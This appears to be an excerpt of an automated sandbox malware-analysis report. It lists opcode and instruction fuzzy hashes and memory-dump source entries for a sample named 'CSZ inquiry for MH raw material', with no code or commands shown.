                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: cfe855aa5370e709d3beaf8d0a0824e85895befd2a0058a9eb758e5aacecaf96
                                                • Instruction ID: 75deedb5c38a6d0dc0c0eedbb1f0df2e56518a98d791b6ba23007ef7594eb467
                                                • Opcode Fuzzy Hash: cfe855aa5370e709d3beaf8d0a0824e85895befd2a0058a9eb758e5aacecaf96
                                                • Instruction Fuzzy Hash: 5A412C75A00705EFDB25CF98C980AAABBF8FF98704B10496DE556DB691D330EA44CF90
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1663919624.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_14d0000_CSZ inquiry for MH raw material.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: e670dd828c136ccd68083a55bd250d47252d823cef32abaf822c5fbc81174675
                                                • Instruction ID: 9d47c69f1262fe24d0871cf14110b503244b52e1a8bf891b9762ee707ab0f3f5
                                                • Opcode Fuzzy Hash: e670dd828c136ccd68083a55bd250d47252d823cef32abaf822c5fbc81174675
                                                • Instruction Fuzzy Hash: A7418E71501702DFCB62EFA8C944A69B7F1FF95314F1085AEC9169F2E1DB30A941CB51
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1663919624.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_14d0000_CSZ inquiry for MH raw material.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 881b37862df3d0125159aad8c48fbcfef1f1c84e8ffb69efe81ceee6976b3bad
                                                • Instruction ID: 57328a62283364e42c7c678235437256a9dfdf71f3079edfecb809c8d4c83cfd
                                                • Opcode Fuzzy Hash: 881b37862df3d0125159aad8c48fbcfef1f1c84e8ffb69efe81ceee6976b3bad
                                                • Instruction Fuzzy Hash: A53179B2A00346DFDB12CFA8D440799BBF0FB89714F2185AED119EF251D372A902CB90
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1663919624.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_14d0000_CSZ inquiry for MH raw material.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 4a9e31dacb61ad2c6c6362e6ab558b8d88139f861f12fc931a714f4fa934610e
                                                • Instruction ID: 03e2ad216b71efef22ff910bc99e5dd5e6c5fb6a741ff081709abcd32b7fc15b
                                                • Opcode Fuzzy Hash: 4a9e31dacb61ad2c6c6362e6ab558b8d88139f861f12fc931a714f4fa934610e
                                                • Instruction Fuzzy Hash: E34190715143019FD320EF29C845B9BBBE8FF88614F104A2EF598DB291D7709944CF92
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1663919624.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_14d0000_CSZ inquiry for MH raw material.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 27c14830bd6be3908fa0d4cc63d819bc7182e33629a94cf0022ba532954cd5c2
                                                • Instruction ID: c12636d16d20b88c78a73f833de7bf2337df3f14c1c6e8db12dca4dfc5c9a0c0
                                                • Opcode Fuzzy Hash: 27c14830bd6be3908fa0d4cc63d819bc7182e33629a94cf0022ba532954cd5c2
                                                • Instruction Fuzzy Hash: C4419433A1402B9BCB28CFA8C49157AB7F1FB88704B5641BDD915EF285DB34A945C790
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1663919624.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_14d0000_CSZ inquiry for MH raw material.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: f20a03325597b9b221cce9a65c0077cce8ad2daa3fcfe25ca13a88bfede46bbb
                                                • Instruction ID: 8dcb18c456663a7b885910282faee6afd704e22218ebd9fe0f934925ccb2ed9f
                                                • Opcode Fuzzy Hash: f20a03325597b9b221cce9a65c0077cce8ad2daa3fcfe25ca13a88bfede46bbb
                                                • Instruction Fuzzy Hash: EE31E2327001069FD718CEACCC44AA6BB97FF85B14F18852DE918CF285E7B4D945C394
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1663919624.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_14d0000_CSZ inquiry for MH raw material.jbxd
                                                • Instruction Fuzzy Hash: DA318A31600605AFE721CF68C884F6AB7B9FF85354F1145AAE6129B3A1E730EE02CB50
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1663919624.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_14d0000_CSZ inquiry for MH raw material.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: ca2018946f7c8f52e09e39cc005437c594ec6595301bb8504e933616792f9ccf
                                                • Instruction ID: cae0e0d5e70aac4829ff7d07a8b659cd3a6de811a5a6432af3aa3faf60451ea4
                                                • Opcode Fuzzy Hash: ca2018946f7c8f52e09e39cc005437c594ec6595301bb8504e933616792f9ccf
                                                • Instruction Fuzzy Hash: 71317F75600216DFCB14DF5CE8869AEB7F6FF84304B154499E8099F391E771EA50CB90
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1663919624.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_14d0000_CSZ inquiry for MH raw material.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 8dd8438090b11bee37d88325d16f277d1f641360e347c2e0d9b1b0e865414bdc
                                                • Instruction ID: d729fb86a89fd568e7850f89eb0332c607587d2b66deb9585536b8faf5b11a18
                                                • Opcode Fuzzy Hash: 8dd8438090b11bee37d88325d16f277d1f641360e347c2e0d9b1b0e865414bdc
                                                • Instruction Fuzzy Hash: A2217E326102058FDB38CE2DD8806AAB7A2FBD5310FA54878ED15DF2C5D775E855C790
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1663919624.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_14d0000_CSZ inquiry for MH raw material.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 099499c9bd258d56feb0aed5a29af4e0fce8da53658b3bb9e9adfe80baad4b26
                                                • Instruction ID: c34be488f03d65a70f8198a02441c1decd10dcc3ee238d3cc2f8ef51856e0958
                                                • Opcode Fuzzy Hash: 099499c9bd258d56feb0aed5a29af4e0fce8da53658b3bb9e9adfe80baad4b26
                                                • Instruction Fuzzy Hash: 4721A07190012A9BDF11EF59C881ABEB7F4FF48740B510069F541FB290E738AD41CBA0
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1663919624.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_14d0000_CSZ inquiry for MH raw material.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 4ca01925e73332b390880332bdd699f11612148728242e7b1154a19095e88e17
                                                • Instruction ID: f24413b2be3d74dfc46258f6a3ef190268368a1430dd5bf295dddfba75484ad9
                                                • Opcode Fuzzy Hash: 4ca01925e73332b390880332bdd699f11612148728242e7b1154a19095e88e17
                                                • Instruction Fuzzy Hash: F921A171600645AFD715EB6CD840F69B7B8FF88754F140169F905EB690E734ED40CB94
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1663919624.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_14d0000_CSZ inquiry for MH raw material.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: dd2f2e5b7c4457ecf239d87a43881ab4c1799b0b2360d34f4c5c92971d66b118
                                                • Instruction ID: 6a3e5071c363328eb3fe0ea4d5ede8a5b6e2a986bba8ae4a4684a841232de22b
                                                • Opcode Fuzzy Hash: dd2f2e5b7c4457ecf239d87a43881ab4c1799b0b2360d34f4c5c92971d66b118
                                                • Instruction Fuzzy Hash: C621C1725042469BE711FF59C844B5FBBDCBFD1250F080456B9809F291DB30C908C6A1
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1663919624.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_14d0000_CSZ inquiry for MH raw material.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: db4ac56b1e28559d3bd4828e6b7be188342e192c715d566574cf22eff13b0f13
                                                • Instruction ID: e290e44e8c3161f66395d87c18ade85fdeef5596e4a22ebd7395d7d2f9eb2703
                                                • Opcode Fuzzy Hash: db4ac56b1e28559d3bd4828e6b7be188342e192c715d566574cf22eff13b0f13
                                                • Instruction Fuzzy Hash: 3821F9367057929BF323576C8C14B297BD9BF82B74F190364FA20AF6D2DBA8C801C250
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1663919624.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_14d0000_CSZ inquiry for MH raw material.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 660a90b3d0def0bd1da674303e85a82717a4626eccac1ad77680c5954ce75de1
                                                • Instruction ID: 12637b0b8ecfc0234053efefd20f322bc83a160bcae9749d4c888cbab8613d89
                                                • Opcode Fuzzy Hash: 660a90b3d0def0bd1da674303e85a82717a4626eccac1ad77680c5954ce75de1
                                                • Instruction Fuzzy Hash: C421E4612042506FDB05CF1A88B44B6BFE5EFC7125B0A81FAE884CF7A3C524D81AC7A0
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1663919624.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_14d0000_CSZ inquiry for MH raw material.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 7099675976c93c6de7b11645f35d3340047c07497632f928c755460cac930c08
                                                • Instruction ID: baf2c2199deb5be76bddbefa114adcc9d26cd6395c09b99f55df9940e31c9a3b
                                                • Opcode Fuzzy Hash: 7099675976c93c6de7b11645f35d3340047c07497632f928c755460cac930c08
                                                • Instruction Fuzzy Hash: AF217979211A029FD725DF29C901B56B7F5BF88B08F24846CA549CFB61E371E842CB94
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1663919624.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_14d0000_CSZ inquiry for MH raw material.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: d7d3be6285c6692efe16cae139245712d6b369b38a2273bbf4d5785117df6b84
                                                • Instruction ID: 00e1d8e8ec8fabe32bc41159088b1a0a8e4d3f0cc31c8836b37592e0f47f5fff
                                                • Opcode Fuzzy Hash: d7d3be6285c6692efe16cae139245712d6b369b38a2273bbf4d5785117df6b84
                                                • Instruction Fuzzy Hash: 2D110A72340A127FEB225655AC81FAB76D9FBD4B60F510428B719CF1D0EB70DD0187A5
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1663919624.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_14d0000_CSZ inquiry for MH raw material.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 9d27c7c7ede4ae8a1c3676c82c1e332085c830f2ae0910a2044d8f46da31dcac
                                                • Instruction ID: 631fce26fce57be0bccbf50e78b62940500bfc0bd7e83399b1c7564b5588b9c6
                                                • Opcode Fuzzy Hash: 9d27c7c7ede4ae8a1c3676c82c1e332085c830f2ae0910a2044d8f46da31dcac
                                                • Instruction Fuzzy Hash: 0321E5B1E40209ABDB20DFAAD8809AEFBF8FF98610F10012FE515EB290D7709945CB54
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1663919624.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_14d0000_CSZ inquiry for MH raw material.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 5cbf44edbda76f4502fdddb46b30f07fa62677dc347fe83d1d029fa4afc5ea58
                                                • Instruction ID: 7ae48c8367105c83ced38d090973e188c04ddaffc8bc7f92ac0de62c23df97c0
                                                • Opcode Fuzzy Hash: 5cbf44edbda76f4502fdddb46b30f07fa62677dc347fe83d1d029fa4afc5ea58
                                                • Instruction Fuzzy Hash: 692181B290020AEFDF129F58CC40B9EBBB9FF89350F204455F900AB251D734D9509B50
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1663919624.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_14d0000_CSZ inquiry for MH raw material.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: e15cc66c493ec87e1f16fcafaae683231044017e0eff3148481e84279e4a8e58
                                                • Instruction ID: 01d93adab2c06223d5805eeddd4b882b4782e520f90020da7ab498899c2c992b
                                                • Opcode Fuzzy Hash: e15cc66c493ec87e1f16fcafaae683231044017e0eff3148481e84279e4a8e58
                                                • Instruction Fuzzy Hash: 2821AF33A108119F9B18CF7CC80546AF7E6FFCD35436A427ED912DB2A4D670BA158A84
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1663919624.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_14d0000_CSZ inquiry for MH raw material.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: bd8ac78140f895066083d1addf409b64165891323dc0076c6e3fdac533eabcce
                                                • Instruction ID: d37047259dad0c441b5a36fd9975d18007a774803fde577482529811605d3871
                                                • Opcode Fuzzy Hash: bd8ac78140f895066083d1addf409b64165891323dc0076c6e3fdac533eabcce
                                                • Instruction Fuzzy Hash: 9F11DD72600706AFE722DA58CC81F9ABBB8FBD0764F100429F6058F190E671ED44DB60
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1663919624.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_14d0000_CSZ inquiry for MH raw material.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 5181d11936f6d4c1da24dcebee36d1e4d69a40bde6f59957180cf1a9d9fd1f95
                                                • Instruction ID: f0eeeea8da5cfd53f900aa7ab01ca0677c0ca59c476c9155ccd68274bd13a4fd
                                                • Opcode Fuzzy Hash: 5181d11936f6d4c1da24dcebee36d1e4d69a40bde6f59957180cf1a9d9fd1f95
                                                • Instruction Fuzzy Hash: 5711B231B006119BDB16CF8DC480E5ABBE9BF9A710B18407DEE089F249D6B2D9018B90
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1663919624.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_14d0000_CSZ inquiry for MH raw material.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 3b9caaf395a22a4929ed725bdef4f5484843110ef385696de3fd96b14fff4041
                                                • Instruction ID: e5c2d663b6fa3ff9967a9fcf501e4e2243fc17ded3f51f2a1b33c3b0a02291e0
                                                • Opcode Fuzzy Hash: 3b9caaf395a22a4929ed725bdef4f5484843110ef385696de3fd96b14fff4041
                                                • Instruction Fuzzy Hash: C3217972600A41DFD72A9F49C560A6ABBE6FBD5B10F14887DE58ACB610C731EC01CB80
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1663919624.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_14d0000_CSZ inquiry for MH raw material.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 109b282de417689e56769a3ef798365f0e1a8e3e609426937603ff6b248b5e7b
                                                • Instruction ID: b0b0317616a573e3dc99673da31d5b33654b0815459a4f7b6f2b493170fff896
                                                • Opcode Fuzzy Hash: 109b282de417689e56769a3ef798365f0e1a8e3e609426937603ff6b248b5e7b
                                                • Instruction Fuzzy Hash: 0D216835A00206DFCB15CF98C580AAEBBB5FF88318F20416DD105AB350CB71AD06CB90
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1663919624.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_14d0000_CSZ inquiry for MH raw material.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 166e74b8905a6ed9c5ac579072f3773007384dfbe5622f68b298745ad89fcc40
                                                • Instruction ID: e23ab528374f2d4ca6be32bcef41287752c8bd4ac7e9432060939736950cd065
                                                • Opcode Fuzzy Hash: 166e74b8905a6ed9c5ac579072f3773007384dfbe5622f68b298745ad89fcc40
                                                • Instruction Fuzzy Hash: 7E216075510A01EFD7219F69C841F66B7F8FF84250F44882DE59ACB250EB70B950CB60
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1663919624.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_14d0000_CSZ inquiry for MH raw material.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 8c94f536ce5d01c217e555b6962ffc68940dc11ef6262aee2e562d482f61f566
                                                • Instruction ID: f5787c4e668c1dae488f2417b860cc6fb9db6d7fc5f4ab57ed066be603625df0
                                                • Opcode Fuzzy Hash: 8c94f536ce5d01c217e555b6962ffc68940dc11ef6262aee2e562d482f61f566
                                                • Instruction Fuzzy Hash: 04118F32240515AFDB22DBADC940F9A7BE8BB95660F114025F205DF261EB70E90987A1
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1663919624.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_14d0000_CSZ inquiry for MH raw material.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 28866ccf81923f21a086739d45ab6d1015b0de37bf9f505722584b94cb73d46c
                                                • Instruction ID: 913dda248958b4eddc2177e73dced244e9f380ffda58a0c3ad0630c02be6c6bb
                                                • Opcode Fuzzy Hash: 28866ccf81923f21a086739d45ab6d1015b0de37bf9f505722584b94cb73d46c
                                                • Instruction Fuzzy Hash: 63110C337051155FDB1ADB29DC51A6F729AFFD6374B25492AE5228F294EA309801C390
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1663919624.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_14d0000_CSZ inquiry for MH raw material.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 5371e0dd6dd5da1db978db9b1235f4aa613dee0e4deb458df56e0863c1d92222
                                                • Instruction ID: 9cb778aaece8f8a565722dc1c2865c25b13f38893ac526ecc268e916e4fc53b1
                                                • Opcode Fuzzy Hash: 5371e0dd6dd5da1db978db9b1235f4aa613dee0e4deb458df56e0863c1d92222
                                                • Instruction Fuzzy Hash: 90118C76A01206ABCB26CF99C580A5ABBE9BFD4650B56407DD905DF315E634EE00CBA0
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1663919624.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_14d0000_CSZ inquiry for MH raw material.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 4aa21802b203594a0c183a0f29eab8f59a86752156d6c183eb3a1b7e63dba1b2
                                                • Instruction ID: 5b9da76b9040c919ca3f8b69b84ee6e3c3ae63cc54ff3eb9dcb49eff6268ea6d
                                                • Opcode Fuzzy Hash: 4aa21802b203594a0c183a0f29eab8f59a86752156d6c183eb3a1b7e63dba1b2
                                                • Instruction Fuzzy Hash: 6E11E236A0090AAFDB19CF98C841A9DBBB5FFC4610F058269E8459B340E671AD01CB80
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1663919624.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_14d0000_CSZ inquiry for MH raw material.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 975f93ae0bdd36ad56dc7d48bb40b3373a7fecd11d003270eb178f636a7ee754
                                                • Instruction ID: 29a5cbbc92a9aeeb74f62d438cd7dcfc8ff755eafab0943f0337f3a88e879d2a
                                                • Opcode Fuzzy Hash: 975f93ae0bdd36ad56dc7d48bb40b3373a7fecd11d003270eb178f636a7ee754
                                                • Instruction Fuzzy Hash: A22106B5A00B059FD3A0CF29D441B56BBF4FB48B10F10492EE98ACBB40E371E814CB90
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1663919624.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_14d0000_CSZ inquiry for MH raw material.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: be7cdff5b472ac4535dea4ef4a70d93a0a3acfb449cd7ab0a5074af29ebfca6c
                                                • Instruction ID: 8f11a2c146a9e967156171fc516f21f296ce218751283c1c24d5c46cb47bca18
                                                • Opcode Fuzzy Hash: be7cdff5b472ac4535dea4ef4a70d93a0a3acfb449cd7ab0a5074af29ebfca6c
                                                • Instruction Fuzzy Hash: 30119E32620601EFE721AF49C846B5EBBF5FB86754F058428EA09AF160DB71DC41DF90
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1663919624.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_14d0000_CSZ inquiry for MH raw material.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1663919624.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_14d0000_CSZ inquiry for MH raw material.jbxd
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1663919624.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_14d0000_CSZ inquiry for MH raw material.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 256e141dc6b9705f9909cc47be5080ee0eb4db29c7708f1459163a76593eb05a
                                                • Instruction ID: 33a3e1473329a04658f9ee4c34c445abf7b7b9661c43e002033713fd78baeb10
                                                • Opcode Fuzzy Hash: 256e141dc6b9705f9909cc47be5080ee0eb4db29c7708f1459163a76593eb05a
                                                • Instruction Fuzzy Hash: 57F0FC332046279BD732179A88D0F2BA595DFE1AE4F1A003FE3059B364C9708D0256D1
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1663919624.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_14d0000_CSZ inquiry for MH raw material.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: ffe4a65f18a6df9d96ee594e39e2691bd2853d5a46a3efb2798a5f51940e1800
                                                • Instruction ID: e0bcd9d569ee4ea1f97b233015f242537fd86ee730e56dfe0d5c77eb6ceb5216
                                                • Opcode Fuzzy Hash: ffe4a65f18a6df9d96ee594e39e2691bd2853d5a46a3efb2798a5f51940e1800
                                                • Instruction Fuzzy Hash: 2D014471A1021AEFDB04DFADD451AAEB7F8FF58344F10405AF914EB351D6749901CBA4
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1663919624.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_14d0000_CSZ inquiry for MH raw material.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 9b619f82ac4de3098509d3f73f04c141b11ed5894bbdc7f719e1ab5cd288873a
                                                • Instruction ID: d1f930d4fa2341fa1039b4d1a46d204746b0948f51d948994bb00936a80151b4
                                                • Opcode Fuzzy Hash: 9b619f82ac4de3098509d3f73f04c141b11ed5894bbdc7f719e1ab5cd288873a
                                                • Instruction Fuzzy Hash: BA014471A0020AEFDB04DFA9D455A9EBBF8FF58304F50445AF914EB390D6749D018BA4
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1663919624.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_14d0000_CSZ inquiry for MH raw material.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 6225b3f56bb7e4a8823ac3bf287c1186c08f5b75335344108ff231fc305a603f
                                                • Instruction ID: 6d24c9d5e71533827e10bbb2d404fc38159e66dda61b067852d90be170ada2ce
                                                • Opcode Fuzzy Hash: 6225b3f56bb7e4a8823ac3bf287c1186c08f5b75335344108ff231fc305a603f
                                                • Instruction Fuzzy Hash: 6101F9313006859BE323971DD809F5DBFD9FF81754F094466FA049F691D6F4C801C210
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1663919624.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_14d0000_CSZ inquiry for MH raw material.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: a0a226a8af9e00a575a56eb8a60783965f47c6cab9f4126e9cf52d4b93937ae5
                                                • Instruction ID: eac79defbf37012d7edaa695826693a204778aa92c774292bbed2069a9f47ec5
                                                • Opcode Fuzzy Hash: a0a226a8af9e00a575a56eb8a60783965f47c6cab9f4126e9cf52d4b93937ae5
                                                • Instruction Fuzzy Hash: 3D018F71A0024ADBDB00DFA9D445AEEBBF8FF58314F14005AE500EB280D734EA02CB94
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1663919624.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_14d0000_CSZ inquiry for MH raw material.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: dbb06fbea8421d8b96890fd2b120b20d820a8046168cc589f8d54c87f08ef009
                                                • Instruction ID: 568bc35086373dc2018d12df35ab9cae5ad0556bdf1270026fa9b26b6d1aaa80
                                                • Opcode Fuzzy Hash: dbb06fbea8421d8b96890fd2b120b20d820a8046168cc589f8d54c87f08ef009
                                                • Instruction Fuzzy Hash: E7F0127220001EBFEF02AF94DD80DAF7B7DFF95298B104125FA11A6160D631DD21A7A0
                                                Memory Dump Source
